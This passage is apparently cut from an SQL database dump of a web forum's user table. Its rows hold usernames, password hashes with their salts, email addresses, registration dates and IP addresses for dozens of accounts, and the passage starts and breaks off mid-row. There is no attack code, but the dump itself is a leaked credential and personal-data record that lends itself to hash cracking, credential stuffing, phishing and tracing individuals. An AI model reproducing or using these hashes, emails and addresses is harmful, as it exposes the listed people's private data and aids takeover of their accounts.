0, 0, '-?ID&p<4.p3x|`.z?1SD_>!7bp>Z6&', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (270, 2, '', 0, 'rookiel', '71de928403c1640cc99f2b36e7be3205', '2015-11-02', 'rookiel@yandex.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446454826, 0, 1463942998, 1468401138, 1449686522, 2947, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092039, '', '0000-00-00', -1, -1, '162.158.103.99', 0, 1, 0, 0, -1, 0, 0, 'YGDP2h1-_K~vHuS*}D-N/zA>CJO7bb', 0, 0, 0, '', 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (271, 2, '', 0, 'joker', 'bf40b9f60a747246c78810d52e5f698f', '2015-11-02', 'rusexport@inbox.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446468786, 0, 1446468786, 1446469326, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.81.19', 0, 1, 0, 0, -1, 0, 0, '0U8D\'>{{G*KUc/VJP3J\\-1_1/>lH|I', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (272, 2, '', 0, 'driveomnd', '7ca52561f80bdd17ed075d700f8ac502', '2015-11-03', 'driveomnd@yopmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446521389, 0, 1446521389, 1446523375, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.104.44', 0, 1, 0, 0, -1, 0, 0, 'Zk>(ejA!~/P=Sx;.bVH5-&N&!|N%i3', 0, 0, 0, '', 0, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (273, 2, '', 0, 'insin', 'a919dcbfc0d39d4c6f690f51d67f5e08', '2015-11-03', 'insin8@yandex.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446526337, 0, 1446536314, 1446537825, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092039, '', '0000-00-00', -1, -1, '162.158.91.86', 0, 1, 0, 0, -1, 0, 0, 'U=F[Kd!BFk:$MV;\'xJA@ZkVN~XwaVY', 0, 0, 0, '', 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (274, 2, '', 0, 'klanc', '062e828c81b8680f6c6302f4869ec015', '2015-11-03', '17kirill71@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446577896, 0, 1455185874, 1457501944, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.81.17', 0, 1, 0, 0, -1, 0, 0, 'Hb5p+|K\\g*?Wge1b.9Vn-9=h?1Znd$', 0, 0, 0, '', 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (275, 2, '', 0, 'samabada', '6476c2e62acb8c6698500ec5c551972d', '2015-11-03', 'nemesis.redalarm@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446587701, 0, 1446587701, 1446587715, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '141.101.105.243', 0, 1, 0, 0, -1, 0, 0, '\\Kcu-zTzm!;pa4AM4^N\\dg]bi785Eo', 0, 0, 0, '', 0, 0, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (276, 2, '', 0, 'ezek13l', '4a80b3dbfb88517279322667981893a0', '2015-11-11', 'ezek13l@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446634140, 0, 1446635613, 1447240457, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '141.101.81.4', 0, 1, 0, 0, -1, 0, 0, ')>|?eH}i5u~WUB_[N$b0|op\\f`/;PC', 0, 0, 0, '', 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (277, 8, '', 0, 'sEACHENGINE902', 'e966539b5696467ccbbb14501836f2ef', '2015-11-04', 'hnyhny2410@HOTMAIL.COM', 0, '', '', '', '', '', '', '', 1, 2, 'Banned', 0, 1446667504, 0, 1446667504, 1446720109, 0, 0, 0, 0, 4, '7', 0, 0, 0, 0, 0, 45091991, '06-26-1982', '1982-06-26', -1, -1, '108.162.222.102', 0, 1, 0, 0, -1, 0, 0, 'uW#DiU.%<7|-7xxs8a#\";qF+wV8xpT', 0, 0, 0, '', 0, 0, 37, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (278, 2, '', 0, 'pax01', 'b3c0263b8c1fc70b368439265c5d8881', '2015-11-05', 'paxinsec@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446681686, 0, 1467256309, 1473285762, 1460079628, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.210.112', 163, 1, 0, 0, -1, 5, 0, '/PHOOxNk^dG7jgYm56Gc\"VnY*`~7L-', 0, 0, 0, '', 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (279, 2, '', 0, 'cyber_tao_flow', 'f0d2e93f6097cfeedf5d00f5e4dbd1c5', '2015-11-05', 'worm-ws@dataromance.net', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446685783, 0, 1446686160, 1446686243, 0, 0, 0, 0, 4, '-6', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.55.188', 0, 1, 0, 0, -1, 0, 0, '*=T+3K0XtWG//L$f1e*MaJ3wx9}.r|', 0, 0, 0, '', 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (280, 2, '', 0, 'horp', '7f1250d7cdfc0219dd12a2a327e80c65', '2015-11-05', 'i162043@trbvm.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446700655, 0, 1446700655, 1446700895, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.91.117', 0, 1, 0, 0, -1, 0, 0, 'fM\"zea{*8jmZ6mp9w^`gJHy\\g:', 0, 0, 0, '', 0, 0, 30, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (284, 2, '', 0, 'H0BB1T', '88e0c547bb3347464de031fae6b07c45', '2015-11-10', 'asisasgard@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447161038, 0, 1454516603, 1454594268, 1454514997, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.81.21', 0, 1, 0, 0, -1, 1, 0, '(P);cuV|S\'OBEZ^ZKKO', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (289, 2, '', 0, 'daily', '1f92d6197947cea14ee019c753a2a1c0', '2015-11-11', 'daily@tuta.io', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447251612, 0, 1460399954, 1464359491, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.216.185', 0, 1, 0, 0, -1, 2, 0, 'v4/U~A%zI2s~EZ53C^AKsll.O', 0, 0, 0, '', 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (295, 2, '', 0, 'pyh.ch', '16f1cb4cbc3cd75636c7ce450082d353', '2016-06-04', 'local@pyh.ch', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447531717, 0, 1463941173, 1465049481, 1457163689, 3020, 2, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.80.15', 0, 1, 0, 0, -1, 0, 0, '`TbeMyK|ABb:ZE$:xRUL^vu>?F{#[x', 0, 0, 0, '', 0, 0, 37, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (296, 2, '', 0, 'MXolotl', 'ea1c6170cb385cfef7cde192e5272d61', '2015-11-16', 'mxoloti@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447675802, 0, 1447675802, 1447676731, 0, 0, 0, 0, 4, '0', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '188.114.103.239', 0, 1, 0, 0, -1, 0, 0, '%a`Y&9JyDm*68ZX*ZV|9Sv=5,;xP[Q', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (297, 2, '', 0, 'azizjon', '11d5bb90ae3394f23520e5113440a6fa', '2015-11-16', 'azizjon@inresearchlab.com', 0, '', 'http://www.inresearchlab.com', '', '', '', '', 'azizjon.m', 1, 1, 'Junior Member', 0, 1447679658, 0, 1447684364, 1447685635, 0, 0, 0, 0, 4, '5', 0, 0, 0, 0, 0, 45091927, '02-20-1987', '1987-02-20', -1, -1, '141.101.80.6', 100, 1, 0, 0, -1, 0, 0, '\"j\'ENZK/YV{+J{\\:dd@c^nK3^|Y[YC', 0, 0, 0, '', 0, 0, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (298, 2, '', 0, 'abdel', '321d3c4d742cad554bdfbdecca0dce6a', '2015-11-16', 'tip36026@clipmail.eu', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447720614, 0, 1458252180, 1458253607, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.105.230', 0, 1, 0, 0, -1, 0, 0, '=\\r5A-FO)h!P_6HTv)jDB1YDr,l.pB', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (299, 2, '', 0, 'jpsrvcorp', 'e9b7284681c68273bb574501f9cd862b', '2015-11-17', 'jpsrvcorp@privatoria.net', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447754056, 0, 1447754056, 1447754282, 0, 0, 0, 0, 4, '-8', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '198.41.226.14', 0, 1, 0, 0, -1, 0, 0, 'y5WX8asT>WAjLaC*%p+#B)U!jKq4l<', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (300, 2, '', 0, 'austinbales', '8ca38957119e5a620253a049a36498e7', '2015-11-17', 'austin.bales.gibson@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447755609, 0, 1447755609, 1447755878, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.88.5', 0, 1, 0, 0, -1, 0, 0, 'x\"W/i9,-\"Td?JmyKhJ1q@xt4^rfLU\"', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (301, 2, '', 0, 'Ayman', 'f160254e4420920e6818091765e6d754', '2015-11-17', 'aimany@protonmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447769220, 0, 1447769220, 1447769463, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.39.223', 0, 1, 0, 0, -1, 0, 0, '0%R-uHGx;W2A:,LxK#3upTP5)w^|5P', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (302, 2, '', 0, 'ccdude', '62055b2a563fa6faa7c07e7d4696155d', '2015-11-17', 'ccdude@nigge.rs', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447817249, 0, 1447817249, 1447817789, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.105.233', 0, 1, 0, 0, -1, 0, 0, 'J?6NAVq/5Z\\+4hbBNqjxa=AXqHuD?j', 0, 0, 0, '', 0, 0, 61, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (303, 2, '', 0, 'armins', '2db0cbefb9dda42276dfd7369a55a3d1', '2015-11-18', 'anonymous_armynjec@list.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447876539, 0, 1449277980, 1449990997, 0, 0, 0, 0, 4, '1', 0, 0, 0, 0, 0, 45091991, '', '0000-00-00', -1, -1, '162.158.103.101', 0, 1, 0, 0, -1, 0, 0, 'dnOcsabQ6OjeAQGRhw*PI]R0\'dq5*$', 0, 0, 0, '', 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (304, 2, '', 0, 'Kosmas', 'd12623f8dbd1b5d7b2e4fff8dcdb3c63', '2015-11-18', 'crzyfingers@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447908418, 0, 1456772738, 1458023263, 1456772712, 3016, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.219.66', 0, 1, 0, 0, -1, 4, 0, 'nmD+~>D?e-U($lba#YXnSp0`?.{o6C\'%c$/6iM$,oAN5LMh^27W', 0, 0, 0, '', 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (315, 2, '', 0, 'R3d', '4a54fe1ce84db242bcc7640daaa39bab', '2015-11-27', 'redteam@tuta.io', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1448648511, 0, 1448648511, 1448648853, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.229.19', 0, 1, 0, 0, -1, 0, 0, 'k%@sSvf3tJ/R6hTMdxy_aB~uvel+;/', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (316, 2, '', 0, 'KristineZd', '05aebdddb38b14f0b9d5cfaea6668e53', '2015-11-27', 'difigiti@ciekawy.poczta.lolekemail.net', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1448679451, 0, 1448679451, 1448679451, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.50.180', 0, 1, 0, 0, -1, 0, 0, 'qKZB.H=\"jXaH=0vK)\"~7-jr6{bC^NV', 0, 0, 0, '', 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (317, 2, '', 0, 'j0hn', '03682ee0c5d2ab6f1d56a398bdbdae23', '2015-11-28', 'j0hn@byom.de', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1448733326, 0, 1448733326, 1448733349, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '141.101.93.63', 0, 1, 0, 0, -1, 0, 0, 'd?YM?*zmYyi+4M+_Fwvnrw(oB9=+]x', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (318, 2, '', 0, 'asfsaf', 'f1657a57c4a9540e58b90fd59c504d27', '2015-11-28', 'j0hn1223@byom.de', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1448735094, 0, 1448735433, 1448735433, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '141.101.93.63', 0, 1, 0, 0, -1, 0, 0, '=YgpUu#v^7Tw!9|^hccNL~l0,9_ic<', 0, 0, 0, '', 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (319, 2, '', 0, 'Blast3r', '05a39c47eb4177c36848c3fc7a05cc2f', '2015-11-30', 'blastert3@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1448874731, 0, 1448877503, 1448878790, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '108.162.229.14', 0, 1, 0, 0, -1, 0, 0, 'Qq>!\"KO]&i}\'n41w~NCHy(mbfR#Y2T', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (320, 2, '', 0, 'johndoe', '878bcbee7ef9886926a2fb2d8be84655', '2015-12-01', 'triclinosa@thrma.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1448989423, 0, 1448989423, 1448990172, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '141.101.99.251', 0, 1, 0, 0, -1, 0, 0, 'Rt72M|5VQLHXP.\'=$9V:G@rH4z.?Q-', 0, 0, 0, '', 0, 0, 59, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (321, 2, '', 0, 'shellgoodman', '40b4bcc6f22c546492349d86aa8becc9', '2015-12-01', 'shellgoodman@ukr.net', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1448993445, 0, 1452433459, 1454720579, 1454720576, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '141.101.96.22', 0, 1, 0, 0, -1, 0, 0, 'tc\"~C=o90LCH9IQ^r@VznaWdHVt6kW-|9j9v6)?p~;zDG0@\"__', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (326, 2, '', 0, 'JQNUlrike', 'b890b67fd012a138d1b4fa85636a995a', '2015-12-05', 'troystruppkpq@yahoo.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1449344242, 0, 1449344242, 1449344242, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.215.46', 0, 1, 0, 0, -1, 0, 0, 'H\\EoKX4ve*?y$@A8Gt.-dz[qG5A!2L', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (327, 2, '', 0, 'DollyTejed', 'ec59d799c901517cd5b7a68192818fe4', '2015-12-06', 'michalkova@list.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1449414650, 0, 1449414650, 1449414650, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.215.200', 0, 1, 0, 0, -1, 0, 0, ':Q!K!ct-?N/5\"2pd27gHkp{,7+$#OI', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (328, 2, '', 0, 'forbz', 'b1d3f1427c77858c3ef25672e7381295', '2015-12-06', 'softax@yandex.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1449448794, 0, 1449448794, 1449448839, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.89.9', 0, 1, 0, 0, -1, 0, 0, 'mOq|A\\{\"TIpLz6cxgFu!Du!gG\'D\\UW', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (329, 2, '', 0, 'ScappaFlow', 'f7cdee7e5320f3219f72f12019adfdcf', '2015-12-08', 'dragonfly.oneg@protonmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1449562609, 0, 1449562609, 1449562609, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.80.15', 0, 1, 0, 0, -1, 0, 0, '`]-8Zyl\\)k0[aO5*', 0, 0, 0, '', 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (335, 2, '', 0, 'AngelaBeat', 'a73a2d557b3df9a595f8160556143953', '2015-12-11', 'civighi@ciekawy.poczta.lolekemail.net', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1449818657, 0, 1449818657, 1449818657, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.55.190', 0, 1, 0, 0, -1, 0, 0, '-B!e9fmr}lmx%zT|h\'Foukmp0RVZ+E', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (336, 2, '', 0, '@BluBailey', '8fed415e1349f5e72e4c100f30e315d7', '2015-12-11', 'praisevisionmedia@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1449847362, 0, 1449847362, 1449847627, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.56.190', 0, 1, 0, 0, -1, 0, 0, 'Bc^eYI65_5HEZ,nH!^rVd*$:\"uGheB', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (337, 2, '', 0, 'terrax', 'e4d64682005d17bee329df07b1f7f7ce', '2015-12-11', 'terrax@byom.de', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1449875318, 0, 1449875318, 1449875474, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.89.2', 0, 1, 0, 0, -1, 0, 0, 'f\"O0LYEBM?Fiyh7^58#3aEJ~c_\\zNq', 0, 0, 0, '', 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (338, 2, '', 0, 'wellknown', '00706c7ab2b9b22d9bdb6a03814f5eba', '2015-12-16', 'wellknown@tuta.io', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1450270979, 0, 1450270979, 1450271034, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '162.158.88.16', 0, 1, 0, 0, -1, 0, 0, 'MhS_8Y%\'\\z/67CSwT8oU/g`DUEDJ6T', 0, 0, 0, '', 0, 0, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (339, 2, '', 0, 'al3x85', 'ed11ace7de2603e7ebe05b1aa51f12be', '2015-12-17', 'al3x85@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1450410832, 0, 1457166743, 1459400319, 0, 0, 0, 0, 4, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.103.92', 0, 1, 0, 0, -1, 0, 0, '803KIZ(O{;s(BgU>ER9m70@r_b*`GT', 0, 0, 0, '', 0, 0, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (340, 2, '', 0, 'hack spear', '13d853982b69eacc227333a72d467156', '2015-12-19', 'mathewtracker26@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1450531501, 0, 1450531501, 1450532003, 1450531599, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.105.241', 0, 1, 0, 0, -1, 0, 0, 'D]Ryrw\\Yzm]kZQF\"I`LtY;w.Nu:aa^', 0, 0, 0, '', 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (341, 2, '', 0, 'slashzor', '6279bf2d31c7d3fd7eb276045922a8c2', '2015-12-20', 'slash7296@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1450608537, 0, 1456362256, 1458669553, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.98.245', 0, 1, 0, 0, -1, 0, 0, '*thc/u8T$LL>}]B4$\\<\"et+6vK%U-K', 0, 0, 0, '', 0, 0, 61, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (342, 2, '', 0, 'ZaDoR', 'c8138e8693e77c0e270798e98c089b87', '2015-12-21', 'danniel.dock@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1450711320, 0, 1450711320, 1450711491, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.17.54', 0, 1, 0, 0, -1, 0, 0, 'fX;lMwpupT]&zZ6+5ln]i1I8g@CO.1', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (343, 2, '', 0, 'king_alex', 'f3182654db7e7974de59154700762cf1', '2015-12-22', 'kingalex@protonmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1450796307, 0, 1464582538, 1465579742, 1450995211, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.88.15', 0, 1, 0, 0, -1, 1, 0, '/fhcBE$\'YpN;#^;A@K#foS{Du\\-M4[', 0, 0, 0, '', 0, 0, 89, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (344, 2, '', 0, 'balt', '804d43b6f580b299dc8e3cb37c01886c', '2015-12-22', 'ya.veys2015@yandex.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1450821158, 0, 1454900632, 1454900632, 1450821201, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.88.99', 0, 1, 0, 0, -1, 0, 0, '97Kw~7/8QX^FG\'Qr#!9ls0\"ux\\4Jy(', 0, 0, 0, '', 0, 0, 63, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (345, 2, '', 0, 'BobCpm1517', 'e85703df3a04b692dcaea2df489a15b3', '2015-12-23', 'jannnunes@nonspammer.de', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1450905163, 0, 1450905163, 1450905163, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.203.91', 0, 1, 0, 0, -1, 0, 0, 'Gt|Z$3.;3;]y[gN2`Nx;Res&\\X.8YBGmMQUj:m`ryS', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (354, 2, '', 0, 'knvomlk', '6fef9861e9dcb33516ecc5da19a0351b', '2015-12-26', 'knvomlk@ghostmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451112836, 0, 1452457242, 1458680612, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.88.5', 0, 1, 0, 0, -1, 0, 0, '4!vq\"MDjI#\'dC&m,@KEhZCkJfEjHn', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (356, 2, '', 0, 'a1da', '717f29d319179376539491b327aef65d', '2015-12-26', 'zaq1ZAQ!@mailinator.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451160173, 0, 1455027293, 1456066894, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '162.158.89.14', 0, 1, 0, 0, -1, 0, 0, '5S58zS^IFn(g_4A]SM2Nj4!j.\"~SC^', 0, 0, 0, '', 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (357, 2, '', 0, 'NPDGrazyna', '09e4b7cd8afd9203f5cfbc4899b3794d', '2015-12-27', 'dannyknisley7156@nonspam.eu', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451220518, 0, 1451220518, 1451220518, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.203.86', 0, 1, 0, 0, -1, 0, 0, '$s~ui}-(\'b6MF_9>u%0tAyV0m.ko%R', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (358, 2, '', 0, 'totegipt', '6aea8737acd2821b3343dff8bd87d617', '2015-12-27', 'tenhri999@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451258052, 0, 1451258314, 1451258314, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '199.27.128.245', 0, 1, 0, 0, -1, 0, 0, '21}xkFXr]-WG-@L|c&M}!Q\'ibh?yv|', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (359, 2, '', 0, 'Sinatra', '66f98fa17de880bca495dff21d3fe9a2', '2015-12-27', 'ms100200@web.de', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451269470, 0, 1451269470, 1451269507, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.88.2', 0, 1, 0, 0, -1, 0, 0, '\'`Wq>*2H\'rs[&1od<7VQ\"8b+2$\\FNX', 0, 0, 0, '', 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (360, 2, '', 0, 'JoshRanson', '5d2e3b1a7bfd97616fb6b6956c931412', '2015-12-28', 'leiatriplett1693@manifestgenerator.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451360940, 0, 1451360940, 1451360940, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.203.96', 0, 1, 0, 0, -1, 0, 0, '\\7gN@\"\"\\c^QAu/@Z3>Nkc/>];>t97v', 0, 0, 0, '', 0, 0, 70, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (361, 2, '', 0, 'FlorianSer', 